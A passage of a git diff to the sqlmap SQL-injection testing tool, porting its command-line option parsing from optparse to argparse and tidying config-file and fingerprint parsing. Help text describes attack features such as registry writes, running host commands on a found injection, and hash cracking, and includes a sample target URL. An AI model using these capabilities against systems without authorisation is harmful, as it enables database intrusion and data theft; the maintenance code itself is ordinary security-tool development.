dest="regKey", - help="Windows registry key") + windows.add_argument("--reg-key", dest="regKey", + help="Windows registry key") - windows.add_option("--reg-value", dest="regVal", - help="Windows registry key value") + windows.add_argument("--reg-value", dest="regVal", + help="Windows registry key value") - windows.add_option("--reg-data", dest="regData", - help="Windows registry key value data") + windows.add_argument("--reg-data", dest="regData", + help="Windows registry key value data") - windows.add_option("--reg-type", dest="regType", - help="Windows registry key value type") + windows.add_argument("--reg-type", dest="regType", + help="Windows registry key value type") # General options - general = OptionGroup(parser, "General", "These options can be used " - "to set some general working parameters") + general = parser.add_argument_group("General", "These options can be used to set some general working parameters") + + general.add_argument("-s", dest="sessionFile", + help="Load session from a stored (.sqlite) file") + + general.add_argument("-t", dest="trafficFile", + help="Log all HTTP traffic into a textual file") + + general.add_argument("--abort-on-empty", dest="abortOnEmpty", action="store_true", + help="Abort data retrieval on empty results") + + general.add_argument("--answers", dest="answers", + help="Set predefined answers (e.g. \"quit=N,follow=N\")") + + general.add_argument("--base64", dest="base64Parameter", + help="Parameter(s) containing Base64 encoded data") + + general.add_argument("--base64-safe", dest="base64Safe", action="store_true", + help="Use URL and filename safe Base64 alphabet (RFC 4648)") + + general.add_argument("--batch", dest="batch", action="store_true", + help="Never ask for user input, use the default behavior") + + general.add_argument("--binary-fields", dest="binaryFields", + help="Result fields having binary values (e.g. \"digest\")") + + general.add_argument("--check-internet", dest="checkInternet", action="store_true", + help="Check Internet connection before assessing the target") - #general.add_option("-x", dest="xmlFile", - # help="Dump the data into an XML file") + general.add_argument("--cleanup", dest="cleanup", action="store_true", + help="Clean up the DBMS from sqlmap specific UDF and tables") - general.add_option("-t", dest="trafficFile", - help="Log all HTTP traffic into a " - "textual file") + general.add_argument("--crawl", dest="crawlDepth", type=int, + help="Crawl the website starting from the target URL") - general.add_option("--batch", dest="batch", - action="store_true", - help="Never ask for user input, use the default behaviour") + general.add_argument("--crawl-exclude", dest="crawlExclude", + help="Regexp to exclude pages from crawling (e.g. \"logout\")") - general.add_option("--charset", dest="charset", - help="Force character encoding used for data retrieval") + general.add_argument("--csv-del", dest="csvDel", + help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel) - general.add_option("--check-tor", dest="checkTor", - action="store_true", - help="Check to see if Tor is used properly") + general.add_argument("--charset", dest="charset", + help="Blind SQL injection charset (e.g. 
\"0123456789abcdef\")") - general.add_option("--crawl", dest="crawlDepth", type="int", - help="Crawl the website starting from the target url") + general.add_argument("--dump-file", dest="dumpFile", + help="Store dumped data to a custom file") - general.add_option("--csv-del", dest="csvDel", - help="Delimiting character used in CSV output " - "(default \"%s\")" % defaults.csvDel) + general.add_argument("--dump-format", dest="dumpFormat", + help="Format of dumped data (CSV (default), HTML or SQLITE)") - general.add_option("--dbms-cred", dest="dbmsCred", - help="DBMS authentication credentials (user:password)") + general.add_argument("--encoding", dest="encoding", + help="Character encoding used for data retrieval (e.g. GBK)") - general.add_option("--dump-format", dest="dumpFormat", - help="Format of dumped data (CSV (default), HTML or SQLITE)") + general.add_argument("--eta", dest="eta", action="store_true", + help="Display for each output the estimated time of arrival") - general.add_option("--eta", dest="eta", - action="store_true", - help="Display for each output the " - "estimated time of arrival") + general.add_argument("--flush-session", dest="flushSession", action="store_true", + help="Flush session files for current target") - general.add_option("--flush-session", dest="flushSession", - action="store_true", - help="Flush session files for current target") + general.add_argument("--forms", dest="forms", action="store_true", + help="Parse and test forms on target URL") - general.add_option("--forms", dest="forms", - action="store_true", - help="Parse and test forms on target url") + general.add_argument("--fresh-queries", dest="freshQueries", action="store_true", + help="Ignore query results stored in session file") - general.add_option("--fresh-queries", dest="freshQueries", - action="store_true", - help="Ignores query results stored in session file") + general.add_argument("--gpage", dest="googlePage", type=int, + help="Use Google dork results from specified page number") - general.add_option("--hex", dest="hexConvert", - action="store_true", - help="Uses DBMS hex function(s) for data retrieval") + general.add_argument("--har", dest="harFile", + help="Log all HTTP traffic into a HAR file") - general.add_option("--output-dir", dest="oDir", - action="store", - help="Custom output directory path") + general.add_argument("--hex", dest="hexConvert", action="store_true", + help="Use hex conversion during data retrieval") - general.add_option("--parse-errors", dest="parseErrors", - action="store_true", - help="Parse and display DBMS error messages from responses") + general.add_argument("--output-dir", dest="outputDir", action="store", + help="Custom output directory path") - general.add_option("--save", dest="saveCmdline", - action="store_true", - help="Save options to a configuration INI file") + general.add_argument("--parse-errors", dest="parseErrors", action="store_true", + help="Parse and display DBMS error messages from responses") - general.add_option("--tor", dest="tor", - action="store_true", - help="Use Tor anonymity network") + general.add_argument("--preprocess", dest="preprocess", + help="Use given script(s) for preprocessing (request)") - general.add_option("--tor-port", dest="torPort", - help="Set Tor proxy port other than default") + general.add_argument("--postprocess", dest="postprocess", + help="Use given script(s) for postprocessing (response)") - general.add_option("--tor-type", dest="torType", - help="Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)") + 
general.add_argument("--repair", dest="repair", action="store_true", + help="Redump entries having unknown character marker (%s)" % INFERENCE_UNKNOWN_CHAR) - general.add_option("--update", dest="updateAll", - action="store_true", - help="Update sqlmap") + general.add_argument("--save", dest="saveConfig", + help="Save options to a configuration INI file") + + general.add_argument("--scope", dest="scope", + help="Regexp for filtering targets") + + general.add_argument("--skip-heuristics", dest="skipHeuristics", action="store_true", + help="Skip heuristic detection of vulnerabilities") + + general.add_argument("--skip-waf", dest="skipWaf", action="store_true", + help="Skip heuristic detection of WAF/IPS protection") + + general.add_argument("--table-prefix", dest="tablePrefix", + help="Prefix used for temporary tables (default: \"%s\")" % defaults.tablePrefix) + + general.add_argument("--test-filter", dest="testFilter", + help="Select tests by payloads and/or titles (e.g. ROW)") + + general.add_argument("--test-skip", dest="testSkip", + help="Skip tests by payloads and/or titles (e.g. BENCHMARK)") + + general.add_argument("--time-limit", dest="timeLimit", type=float, + help="Run with a time limit in seconds (e.g. 3600)") + + general.add_argument("--unsafe-naming", dest="unsafeNaming", action="store_true", + help="Disable escaping of DBMS identifiers (e.g. \"user\")") + + general.add_argument("--web-root", dest="webRoot", + help="Web server document root directory (e.g. \"/var/www\")") # Miscellaneous options - miscellaneous = OptionGroup(parser, "Miscellaneous") + miscellaneous = parser.add_argument_group("Miscellaneous", "These options do not fit into any other category") + + miscellaneous.add_argument("-z", dest="mnemonics", + help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") - miscellaneous.add_option("-z", dest="mnemonics", - help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")") + miscellaneous.add_argument("--alert", dest="alert", + help="Run host OS command(s) when SQL injection is found") - miscellaneous.add_option("--alert", dest="alert", - help="Run shell command(s) when SQL injection is found") + miscellaneous.add_argument("--beep", dest="beep", action="store_true", + help="Beep on question and/or when vulnerability is found") - miscellaneous.add_option("--answers", dest="answers", - help="Set question answers (e.g. 
\"quit=N,follow=N\")") + miscellaneous.add_argument("--dependencies", dest="dependencies", action="store_true", + help="Check for missing (optional) sqlmap dependencies") - miscellaneous.add_option("--beep", dest="beep", action="store_true", - help="Make a beep sound when SQL injection is found") + miscellaneous.add_argument("--disable-coloring", dest="disableColoring", action="store_true", + help="Disable console output coloring") - miscellaneous.add_option("--check-payload", dest="checkPayload", - action="store_true", - help="Offline WAF/IPS/IDS payload detection testing") + miscellaneous.add_argument("--disable-hashing", dest="disableHashing", action="store_true", + help="Disable hash analysis on table dumps") - miscellaneous.add_option("--check-waf", dest="checkWaf", - action="store_true", - help="Check for existence of WAF/IPS/IDS protection") + miscellaneous.add_argument("--gui", dest="gui", action="store_true", + help="Experimental Tkinter GUI") - miscellaneous.add_option("--cleanup", dest="cleanup", - action="store_true", - help="Clean up the DBMS by sqlmap specific " - "UDF and tables") + miscellaneous.add_argument("--list-tampers", dest="listTampers", action="store_true", + help="Display list of available tamper scripts") - miscellaneous.add_option("--dependencies", dest="dependencies", - action="store_true", - help="Check for missing (non-core) sqlmap dependencies") + miscellaneous.add_argument("--no-logging", dest="noLogging", action="store_true", + help="Disable logging to a file") - miscellaneous.add_option("--disable-coloring", dest="disableColoring", - action="store_true", - help="Disable console output coloring") + miscellaneous.add_argument("--no-truncate", dest="noTruncate", action="store_true", + help="Disable console output truncation (e.g. long entr...)") - miscellaneous.add_option("--gpage", dest="googlePage", type="int", - help="Use Google dork results from specified page number") + miscellaneous.add_argument("--offline", dest="offline", action="store_true", + help="Work in offline mode (only use session data)") - miscellaneous.add_option("--hpp", dest="hpp", - action="store_true", - help="Use HTTP parameter pollution") + miscellaneous.add_argument("--purge", dest="purge", action="store_true", + help="Safely remove all content from sqlmap data directory") - miscellaneous.add_option("--mobile", dest="mobile", - action="store_true", - help="Imitate smartphone through HTTP User-Agent header") + miscellaneous.add_argument("--results-file", dest="resultsFile", + help="Location of CSV results file in multiple targets mode") - miscellaneous.add_option("--page-rank", dest="pageRank", - action="store_true", - help="Display page rank (PR) for Google dork results") + miscellaneous.add_argument("--shell", dest="shell", action="store_true", + help="Prompt for an interactive sqlmap shell") - miscellaneous.add_option("--purge-output", dest="purgeOutput", - action="store_true", - help="Safely remove all content from output directory") + miscellaneous.add_argument("--tmp-dir", dest="tmpDir", + help="Local directory for storing temporary files") - miscellaneous.add_option("--smart", dest="smart", - action="store_true", - help="Conduct through tests only if positive heuristic(s)") + miscellaneous.add_argument("--tui", dest="tui", action="store_true", + help="Experimental ncurses TUI") - miscellaneous.add_option("--test-filter", dest="testFilter", - help="Select tests by payloads and/or titles (e.g. 
ROW)") + miscellaneous.add_argument("--unstable", dest="unstable", action="store_true", + help="Adjust options for unstable connections") - miscellaneous.add_option("--wizard", dest="wizard", - action="store_true", - help="Simple wizard interface for beginner users") + miscellaneous.add_argument("--update", dest="updateAll", action="store_true", + help="Update sqlmap") + + miscellaneous.add_argument("--wizard", dest="wizard", action="store_true", + help="Simple wizard interface for beginner users") # Hidden and/or experimental options - parser.add_option("--pickled-options", dest="pickledOptions", help=SUPPRESS_HELP) + parser.add_argument("--crack", dest="hashFile", + help=SUPPRESS) # "Load and crack hashes from a file (standalone)" - parser.add_option("--profile", dest="profile", action="store_true", - help=SUPPRESS_HELP) + parser.add_argument("--dummy", dest="dummy", action="store_true", + help=SUPPRESS) - parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int", - help=SUPPRESS_HELP) + parser.add_argument("--yuge", dest="yuge", action="store_true", + help=SUPPRESS) - parser.add_option("--force-dns", dest="forceDns", action="store_true", - help=SUPPRESS_HELP) + parser.add_argument("--murphy-rate", dest="murphyRate", type=int, + help=SUPPRESS) - parser.add_option("--smoke-test", dest="smokeTest", action="store_true", - help=SUPPRESS_HELP) + parser.add_argument("--debug", dest="debug", action="store_true", + help=SUPPRESS) - parser.add_option("--live-test", dest="liveTest", action="store_true", - help=SUPPRESS_HELP) + parser.add_argument("--deprecations", dest="deprecations", action="store_true", + help=SUPPRESS) - parser.add_option("--stop-fail", dest="stopFail", action="store_true", - help=SUPPRESS_HELP) + parser.add_argument("--disable-multi", dest="disableMulti", action="store_true", + help=SUPPRESS) - parser.add_option("--run-case", dest="runCase", help=SUPPRESS_HELP) + parser.add_argument("--disable-precon", dest="disablePrecon", action="store_true", + help=SUPPRESS) - parser.add_option_group(target) - parser.add_option_group(request) - parser.add_option_group(optimization) - parser.add_option_group(injection) - parser.add_option_group(detection) - parser.add_option_group(techniques) - parser.add_option_group(fingerprint) - parser.add_option_group(enumeration) - parser.add_option_group(brute) - parser.add_option_group(udf) - parser.add_option_group(filesystem) - parser.add_option_group(takeover) - parser.add_option_group(windows) - parser.add_option_group(general) - parser.add_option_group(miscellaneous) + parser.add_argument("--profile", dest="profile", action="store_true", + help=SUPPRESS) - # Dirty hack to display longer options without breaking into two lines - def _(self, *args): - _ = parser.formatter._format_option_strings(*args) - if len(_) > MAX_HELP_OPTION_LENGTH: - _ = ("%%.%ds.." 
% (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % _ - return _ + parser.add_argument("--localhost", dest="localhost", action="store_true", + help=SUPPRESS) - parser.formatter._format_option_strings = parser.formatter.format_option_strings - parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser)) + parser.add_argument("--force-dbms", dest="forceDbms", + help=SUPPRESS) - # Dirty hack for making a short option -hh - option = parser.get_option("--hh") - option._short_opts = ["-hh"] - option._long_opts = [] + parser.add_argument("--force-dns", dest="forceDns", action="store_true", + help=SUPPRESS) - # Dirty hack for inherent help message of switch -h - option = parser.get_option("-h") - option.help = option.help.capitalize().replace("this help", "basic help") + parser.add_argument("--force-partial", dest="forcePartial", action="store_true", + help=SUPPRESS) - args = [] - advancedHelp = True + parser.add_argument("--force-pivoting", dest="forcePivoting", action="store_true", + help=SUPPRESS) - for arg in sys.argv: - args.append(getUnicode(arg, system=True)) + parser.add_argument("--ignore-stdin", dest="ignoreStdin", action="store_true", + help=SUPPRESS) - checkDeprecatedOptions(args) + parser.add_argument("--non-interactive", dest="nonInteractive", action="store_true", + help=SUPPRESS) - # Hide non-basic options in basic help case - for i in xrange(len(sys.argv)): - if sys.argv[i] == '-hh': - sys.argv[i] = '-h' - elif sys.argv[i] == '-h': + parser.add_argument("--smoke-test", dest="smokeTest", action="store_true", + help=SUPPRESS) + + parser.add_argument("--vuln-test", dest="vulnTest", action="store_true", + help=SUPPRESS) + + parser.add_argument("--disable-json", dest="disableJson", action="store_true", + help=SUPPRESS) + + # API options + parser.add_argument("--api", dest="api", action="store_true", + help=SUPPRESS) + + parser.add_argument("--taskid", dest="taskid", + help=SUPPRESS) + + parser.add_argument("--database", dest="database", + help=SUPPRESS) + + # Dirty hack to display longer options without breaking into two lines + if hasattr(parser, "formatter"): + def _(self, *args): + retVal = parser.formatter._format_option_strings(*args) + if len(retVal) > MAX_HELP_OPTION_LENGTH: + retVal = ("%%.%ds.." % (MAX_HELP_OPTION_LENGTH - parser.formatter.indent_increment)) % retVal + return retVal + + parser.formatter._format_option_strings = parser.formatter.format_option_strings + parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser) + else: + def _format_action_invocation(self, action): + retVal = self.__format_action_invocation(action) + if len(retVal) > MAX_HELP_OPTION_LENGTH: + retVal = ("%%.%ds.." 
% (MAX_HELP_OPTION_LENGTH - self._indent_increment)) % retVal + return retVal + + parser.formatter_class.__format_action_invocation = parser.formatter_class._format_action_invocation + parser.formatter_class._format_action_invocation = _format_action_invocation + + # Dirty hack for making a short option '-hh' + if hasattr(parser, "get_option"): + option = parser.get_option("--hh") + option._short_opts = ["-hh"] + option._long_opts = [] + else: + for action in get_actions(parser): + if action.option_strings == ["--hh"]: + action.option_strings = ["-hh"] + break + + # Dirty hack for inherent help message of switch '-h' + if hasattr(parser, "get_option"): + option = parser.get_option("-h") + option.help = option.help.capitalize().replace("this help", "basic help") + else: + for action in get_actions(parser): + if action.option_strings == ["-h", "--help"]: + action.help = action.help.capitalize().replace("this help", "basic help") + break + + _ = [] + advancedHelp = True + extraHeaders = [] + auxIndexes = {} + + # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") + for arg in argv: + _.append(getUnicode(arg, encoding=sys.stdin.encoding)) + + argv = _ + checkOldOptions(argv) + + if "--gui" in argv: + from lib.utils.gui import runGui + + runGui(parser) + + raise SqlmapSilentQuitException + + elif "--tui" in argv: + from lib.utils.tui import runTui + + runTui(parser) + + raise SqlmapSilentQuitException + + elif "--shell" in argv: + _createHomeDirectories() + + parser.usage = "" + cmdLineOptions.sqlmapShell = True + + commands = set(("x", "q", "exit", "quit", "clear")) + commands.update(get_all_options(parser)) + + autoCompletion(AUTOCOMPLETE_TYPE.SQLMAP, commands=commands) + + while True: + command = None + prompt = "sqlmap > " + + try: + # Note: in Python2 command should not be converted to Unicode before passing to shlex (Reference: https://bugs.python.org/issue1170) + command = _input(prompt).strip() + except (KeyboardInterrupt, EOFError): + print() + raise SqlmapShellQuitException + + command = re.sub(r"(?i)\Anew\s+", "", command or "") + + if not command: + continue + elif command.lower() == "clear": + clearHistory() + dataToStdout("[i] history cleared\n") + saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) + elif command.lower() in ("x", "q", "exit", "quit"): + raise SqlmapShellQuitException + elif command[0] != '-': + if not re.search(r"(?i)\A(\?|help)\Z", command): + dataToStdout("[!] 
invalid option(s) provided\n") + dataToStdout("[i] valid example: '-u http://www.site.com/vuln.php?id=1 --banner'\n") + else: + saveHistory(AUTOCOMPLETE_TYPE.SQLMAP) + loadHistory(AUTOCOMPLETE_TYPE.SQLMAP) + break + + try: + for arg in shlex.split(command): + argv.append(getUnicode(arg, encoding=sys.stdin.encoding)) + except ValueError as ex: + raise SqlmapSyntaxException("something went wrong during command line parsing ('%s')" % getSafeExString(ex)) + + longOptions = set(re.findall(r"\-\-([^= ]+?)=", parser.format_help())) + longSwitches = set(re.findall(r"\-\-([^= ]+?)\s", parser.format_help())) + + for i in xrange(len(argv)): + # Reference: https://en.wiktionary.org/wiki/- + argv[i] = re.sub(u"\\A(\u2010|\u2013|\u2212|\u2014|\u4e00|\u1680|\uFE63|\uFF0D)+", lambda match: '-' * len(match.group(0)), argv[i]) + + # Reference: https://unicode-table.com/en/sets/quotation-marks/ + argv[i] = argv[i].strip(u"\u00AB\u2039\u00BB\u203A\u201E\u201C\u201F\u201D\u2019\u275D\u275E\u276E\u276F\u2E42\u301D\u301E\u301F\uFF02\u201A\u2018\u201B\u275B\u275C") + + if argv[i] == "-hh": + argv[i] = "-h" + elif i == 1 and re.search(r"\A(http|www\.|\w[\w.-]+\.\w{2,})", argv[i]) is not None: + argv[i] = "--url=%s" % argv[i] + elif len(argv[i]) > 1 and all(ord(_) in xrange(0x2018, 0x2020) for _ in ((argv[i].split('=', 1)[-1].strip() or ' ')[0], argv[i][-1])): + dataToStdout("[!] copy-pasting illegal (non-console) quote characters from Internet is illegal (%s)\n" % argv[i]) + raise SystemExit + elif len(argv[i]) > 1 and u"\uff0c" in argv[i].split('=', 1)[-1]: + dataToStdout("[!] copy-pasting illegal (non-console) comma characters from Internet is illegal (%s)\n" % argv[i]) + raise SystemExit + elif re.search(r"\A-\w=.+", argv[i]): + dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i]) + raise SystemExit + elif re.search(r"\A-\w{3,}", argv[i]): + if argv[i].strip('-').split('=')[0] in (longOptions | longSwitches): + argv[i] = "-%s" % argv[i] + elif argv[i] in IGNORED_OPTIONS: + argv[i] = "" + elif argv[i] in DEPRECATED_OPTIONS: + argv[i] = "" + elif argv[i] in ("-s", "--silent"): + if i + 1 < len(argv) and argv[i + 1].startswith('-') or i + 1 == len(argv): + argv[i] = "" + conf.verbose = 0 + elif argv[i].startswith("--data-raw"): + argv[i] = argv[i].replace("--data-raw", "--data", 1) + elif argv[i].startswith("--auth-creds"): + argv[i] = argv[i].replace("--auth-creds", "--auth-cred", 1) + elif argv[i].startswith("--drop-cookie"): + argv[i] = argv[i].replace("--drop-cookie", "--drop-set-cookie", 1) + elif re.search(r"\A--tamper[^=\s]", argv[i]): + argv[i] = "" + elif re.search(r"\A(--(tamper|ignore-code|skip))(?!-)", argv[i]): + key = re.search(r"\-?\-(\w+)\b", argv[i]).group(1) + index = auxIndexes.get(key, None) + if index is None: + index = i if '=' in argv[i] else (i + 1 if i + 1 < len(argv) and not argv[i + 1].startswith('-') else None) + auxIndexes[key] = index + else: + delimiter = ',' + argv[index] = "%s%s%s" % (argv[index], delimiter, argv[i].split('=')[1] if '=' in argv[i] else (argv[i + 1] if i + 1 < len(argv) and not argv[i + 1].startswith('-') else "")) + argv[i] = "" + elif argv[i] in ("-H", "--header") or any(argv[i].startswith("%s=" % _) for _ in ("-H", "--header")): + if '=' in argv[i]: + extraHeaders.append(argv[i].split('=', 1)[1]) + elif i + 1 < len(argv): + extraHeaders.append(argv[i + 1]) + elif argv[i] == "--deps": + argv[i] = "--dependencies" + elif argv[i] == "--disable-colouring": + argv[i] = "--disable-coloring" + elif argv[i] == "-r": + for j in 
xrange(i + 2, len(argv)): + value = argv[j] + if os.path.isfile(value): + argv[i + 1] += ",%s" % value + argv[j] = '' + else: + break + elif re.match(r"\A\d+!\Z", argv[i]) and argv[max(0, i - 1)] == "--threads" or re.match(r"\A--threads.+\d+!\Z", argv[i]): + argv[i] = argv[i][:-1] + conf.skipThreadCheck = True + elif argv[i] == "--version": + print(VERSION_STRING.split('/')[-1]) + raise SystemExit + elif argv[i] in ("-h", "--help"): advancedHelp = False - for group in parser.option_groups[:]: + for group in get_groups(parser)[:]: found = False - for option in group.option_list: + for option in get_actions(group): if option.dest not in BASIC_HELP_ITEMS: - option.help = SUPPRESS_HELP + option.help = SUPPRESS else: found = True if not found: - parser.option_groups.remove(group) + get_groups(parser).remove(group) + elif '=' in argv[i] and not argv[i].startswith('-') and argv[i].split('=')[0] in longOptions and re.search(r"\A-{1,2}\w", argv[i - 1]) is None: + dataToStdout("[!] detected usage of long-option without a starting hyphen ('%s')\n" % argv[i]) + raise SystemExit + + for verbosity in (_ for _ in argv if re.search(r"\A\-v+\Z", _)): + try: + if argv.index(verbosity) == len(argv) - 1 or not argv[argv.index(verbosity) + 1].isdigit(): + conf.verbose = verbosity.count('v') + del argv[argv.index(verbosity)] + except (IndexError, ValueError): + pass try: - (args, _) = parser.parse_args(args) + (args, _) = parser.parse_known_args(argv) if hasattr(parser, "parse_known_args") else parser.parse_args(argv) + except UnicodeEncodeError as ex: + dataToStdout("\n[!] %s\n" % getUnicode(ex.object.encode("unicode-escape"))) + raise SystemExit except SystemExit: - if '-h' in sys.argv and not advancedHelp: - print "\n[!] to see full list of options run with '-hh'" + if "-h" in argv and not advancedHelp: + dataToStdout("\n[!] to see full list of options run with '-hh'\n") raise + if extraHeaders: + if not args.headers: + args.headers = "" + delimiter = "\\n" if "\\n" in args.headers else "\n" + args.headers += delimiter + delimiter.join(extraHeaders) + # Expand given mnemonic options (e.g. -z "ign,flu,bat") - for i in xrange(len(sys.argv) - 1): - if sys.argv[i] == '-z': - expandMnemonics(sys.argv[i + 1], parser, args) - - if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, \ - args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \ - args.purgeOutput, args.pickledOptions)): - errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --update, --purge-output or --dependencies), " - errMsg += "use -h for basic or -hh for advanced help" + for i in xrange(len(argv) - 1): + if argv[i] == "-z": + expandMnemonics(argv[i + 1], parser, args) + + if args.dummy: + args.url = args.url or DUMMY_URL + + if hasattr(sys.stdin, "fileno") and not any((os.isatty(sys.stdin.fileno()), args.api, args.ignoreStdin, "GITHUB_ACTIONS" in os.environ)): + args.stdinPipe = iter(sys.stdin.readline, None) + else: + args.stdinPipe = None + + if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.vulnTest, args.wizard, args.dependencies, args.purge, args.listTampers, args.hashFile, args.stdinPipe)): + errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, --wizard, --shell, --update, --purge, --list-tampers or --dependencies). 
" + errMsg += "Use -h for basic and -hh for advanced help\n" parser.error(errMsg) return args - except (OptionError, TypeError), e: - parser.error(e) + except (ArgumentError, TypeError) as ex: + parser.error(ex) except SystemExit: # Protection against Windows dummy double clicking - if IS_WIN: - print "\nPress Enter to continue...", - raw_input() + if IS_WIN and "--non-interactive" not in sys.argv: + dataToStdout("\nPress Enter to continue...") + _input() raise debugMsg = "parsing command line" diff --git a/lib/parse/configfile.py b/lib/parse/configfile.py index 8fa3d8f8063..a3bd3786b4f 100644 --- a/lib/parse/configfile.py +++ b/lib/parse/configfile.py @@ -1,41 +1,46 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import codecs - -from ConfigParser import MissingSectionHeaderError - from lib.core.common import checkFile +from lib.core.common import getSafeExString +from lib.core.common import openFile from lib.core.common import unArrayizeValue from lib.core.common import UnicodeRawConfigParser +from lib.core.convert import getUnicode +from lib.core.data import cmdLineOptions from lib.core.data import conf from lib.core.data import logger +from lib.core.enums import OPTION_TYPE from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapSyntaxException from lib.core.optiondict import optDict -from lib.core.settings import UNICODE_ENCODING config = None -def configFileProxy(section, option, boolean=False, integer=False): +def configFileProxy(section, option, datatype): """ Parse configuration file and save settings into the configuration advanced dictionary. 
""" - global config - if config.has_option(section, option): - if boolean: - value = config.getboolean(section, option) if config.get(section, option) else False - elif integer: - value = config.getint(section, option) if config.get(section, option) else 0 - else: - value = config.get(section, option) + try: + if datatype == OPTION_TYPE.BOOLEAN: + value = config.getboolean(section, option) if config.get(section, option) else False + elif datatype == OPTION_TYPE.INTEGER: + value = config.getint(section, option) if config.get(section, option) else 0 + elif datatype == OPTION_TYPE.FLOAT: + value = config.getfloat(section, option) if config.get(section, option) else 0.0 + else: + value = config.get(section, option) + except ValueError as ex: + errMsg = "error occurred while processing the option " + errMsg += "'%s' in provided configuration file ('%s')" % (option, getUnicode(ex)) + raise SqlmapSyntaxException(errMsg) if value: conf[option] = value @@ -59,36 +64,35 @@ def configFileParser(configFile): logger.debug(debugMsg) checkFile(configFile) - configFP = codecs.open(configFile, "rb", UNICODE_ENCODING) + configFP = openFile(configFile, 'r') try: config = UnicodeRawConfigParser() - config.readfp(configFP) - except MissingSectionHeaderError: - errMsg = "you have provided an invalid configuration file" + if hasattr(config, "read_file"): + config.read_file(configFP) + else: + config.readfp(configFP) + except Exception as ex: + errMsg = "you have provided an invalid and/or unreadable configuration file ('%s')" % getSafeExString(ex) raise SqlmapSyntaxException(errMsg) if not config.has_section("Target"): errMsg = "missing a mandatory section 'Target' in the configuration file" raise SqlmapMissingMandatoryOptionException(errMsg) - condition = not config.has_option("Target", "url") - condition &= not config.has_option("Target", "logFile") - condition &= not config.has_option("Target", "bulkFile") - condition &= not config.has_option("Target", "googleDork") - condition &= not config.has_option("Target", "requestFile") - condition &= not config.has_option("Target", "wizard") + mandatory = False + + for option in ("direct", "url", "logFile", "bulkFile", "googleDork", "requestFile", "wizard"): + if config.has_option("Target", option) and config.get("Target", option) or cmdLineOptions.get(option): + mandatory = True + break - if condition: + if not mandatory: errMsg = "missing a mandatory option in the configuration file " - errMsg += "(url, logFile, bulkFile, googleDork, requestFile or wizard)" + errMsg += "(direct, url, logFile, bulkFile, googleDork, requestFile or wizard)" raise SqlmapMissingMandatoryOptionException(errMsg) for family, optionData in optDict.items(): for option, datatype in optionData.items(): datatype = unArrayizeValue(datatype) - - boolean = datatype == "boolean" - integer = datatype == "integer" - - configFileProxy(family, option, boolean, integer) + configFileProxy(family, option, datatype) diff --git a/lib/parse/handler.py b/lib/parse/handler.py index 12116cc4b5e..f97bf5c7759 100644 --- a/lib/parse/handler.py +++ b/lib/parse/handler.py @@ -1,13 +1,14 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import re from xml.sax.handler import ContentHandler + from lib.core.common import sanitizeStr class FingerprintHandler(ContentHandler): @@ -19,7 +20,7 @@ class 
FingerprintHandler(ContentHandler): def __init__(self, banner, info): ContentHandler.__init__(self) - self._banner = sanitizeStr(banner) + self._banner = sanitizeStr(banner or "") self._regexp = None self._match = None self._dbmsVersion = None @@ -29,13 +30,13 @@ def __init__(self, banner, info): def _feedInfo(self, key, value): value = sanitizeStr(value) - if value in (None, "None"): + if value in (None, "None", ""): return if key == "dbmsVersion": self._info[key] = value else: - if key not in self._info.keys(): + if key not in self._info: self._info[key] = set() for _ in value.split("|"): @@ -44,9 +45,9 @@ def _feedInfo(self, key, value): def startElement(self, name, attrs): if name == "regexp": self._regexp = sanitizeStr(attrs.get("value")) - _ = re.match("\A[A-Za-z0-9]+", self._regexp) # minor trick avoiding compiling of large amount of regexes + _ = re.match(r"\A[A-Za-z0-9]+", self._regexp) # minor trick avoiding compiling of large amount of regexes - if _ and _.group(0).lower() in self._banner.lower() or not _: + if _ and self._banner and _.group(0).lower() in self._banner.lower() or not _: self._match = re.search(self._regexp, self._banner, re.I | re.M) else: self._match = None @@ -61,16 +62,16 @@ def startElement(self, name, attrs): self._techVersion = sanitizeStr(attrs.get("tech_version")) self._sp = sanitizeStr(attrs.get("sp")) - if self._dbmsVersion.isdigit(): + if self._dbmsVersion and self._dbmsVersion.isdigit(): self._feedInfo("dbmsVersion", self._match.group(int(self._dbmsVersion))) - if self._techVersion.isdigit(): + if self._techVersion and self._techVersion.isdigit(): self._feedInfo("technology", "%s %s" % (attrs.get("technology"), self._match.group(int(self._techVersion)))) else: self._feedInfo("technology", attrs.get("technology")) if self._sp.isdigit(): - self._feedInfo("sp", "Service Pack %s" % self._match.group(int(self._sp))) + self._feedInfo("sp", "Service Pack %s" % int(self._sp)) self._regexp = None self._match = None diff --git a/lib/parse/headers.py b/lib/parse/headers.py index 7384b14b9b6..0a47a0985cc 100644 --- a/lib/parse/headers.py +++ b/lib/parse/headers.py @@ -1,20 +1,17 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import itertools import os -from lib.core.common import checkFile from lib.core.common import parseXmlFile from lib.core.data import kb from lib.core.data import paths from 